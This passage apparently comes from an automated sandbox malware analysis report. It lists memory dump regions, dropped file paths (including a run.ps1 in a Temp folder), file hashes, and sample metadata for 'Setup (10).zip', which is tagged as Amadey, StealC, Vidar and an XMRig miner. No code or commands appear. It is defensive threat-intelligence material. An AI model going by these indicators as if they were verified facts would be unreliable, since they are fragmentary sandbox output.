SHA512	4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

memory/4924-404-0x0000000071FF0000-0x000000007216D000-memory.dmp

memory/4924-413-0x0000000071FF0000-0x000000007216D000-memory.dmp

memory/4024-417-0x00007FF83F8C0000-0x00007FF840F60000-memory.dmp

memory/1428-420-0x00007FF8612E0000-0x00007FF8614E9000-memory.dmp

memory/4024-421-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1428-422-0x0000000000780000-0x00000000007F1000-memory.dmp

memory/2608-426-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2608-428-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2608-430-0x000002615B650000-0x000002615B670000-memory.dmp

memory/2608-429-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2608-434-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2608-433-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2608-432-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2608-431-0x0000000140000000-0x00000001407DC000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5	8202a1cd02e7d69597995cabbe881a12
SHA1	8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256	58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512	97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5	9832604db7849a808f46de5fefc51372
SHA1	20d1943eca21c43e0d48be890426fb616911a64f
SHA256	527a9714a02997a16a4b4b51287c7ffcc1d29b0a10caba137d5476fced9198c0
SHA512	d0cbe5d3754df7d5b29bf9466bfd96da4e9b4b4271ecdedae5031bcc4397df8cfe941676271e4ef0a212fe04687816f3d0764eeecc96d0ccfa8cf05bfd13f6de

C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1

MD5	1e49c49df1e9bb5a3646fbdd72fff72d
SHA1	ca3b2f92797030ad96341c5551812e679e9746d3
SHA256	df52ed4a147cad99aec03614368f8781e806c45be6e046ec4a73a26e7ec9cd10
SHA512	b0c96599de30f1822ddc99d1fed6341ae06f25a171c52b9a78f6304d02a30f8da41738d4af4b4c8365b0b52739b3df03be99dddf764f12f724bd24a91b59c82d

memory/3684-450-0x0000000002770000-0x00000000027A6000-memory.dmp

memory/3684-452-0x0000000005170000-0x000000000579A000-memory.dmp

memory/3684-453-0x00000000057F0000-0x0000000005812000-memory.dmp

memory/3684-454-0x0000000005990000-0x00000000059F6000-memory.dmp

memory/3684-455-0x0000000005A70000-0x0000000005AD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ojujtals.qap.ps1

MD5	d17fe0a3f47be24a6453e9ef58c94641
SHA1	6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256	96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512	5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3684-464-0x0000000005AE0000-0x0000000005E37000-memory.dmp

memory/3684-465-0x0000000005F40000-0x0000000005F5E000-memory.dmp

memory/3684-466-0x0000000005F80000-0x0000000005FCC000-memory.dmp

memory/3684-468-0x00000000071E0000-0x0000000007276000-memory.dmp

memory/3684-469-0x00000000064C0000-0x00000000064DA000-memory.dmp

memory/3684-470-0x0000000006530000-0x0000000006552000-memory.dmp

memory/3684-471-0x0000000007830000-0x0000000007DD6000-memory.dmp

memory/3684-472-0x0000000008460000-0x0000000008ADA000-memory.dmp

Sample ID	240614-psz1zs1cjb
Target	Setup (10).zip
SHA256	da776507672afdca20f7322294fc110216daa2e35e453ea45a19599e34788399
Tags	amadey stealc vidar ffb1b9 discovery spyware stealer trojan xmrig execution miner upx

Malware Analysis Report

2024-09-11 16:06

Table of Contents

Analysis Overview

Threat Level: Known bad

Malicious Activity Summary

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files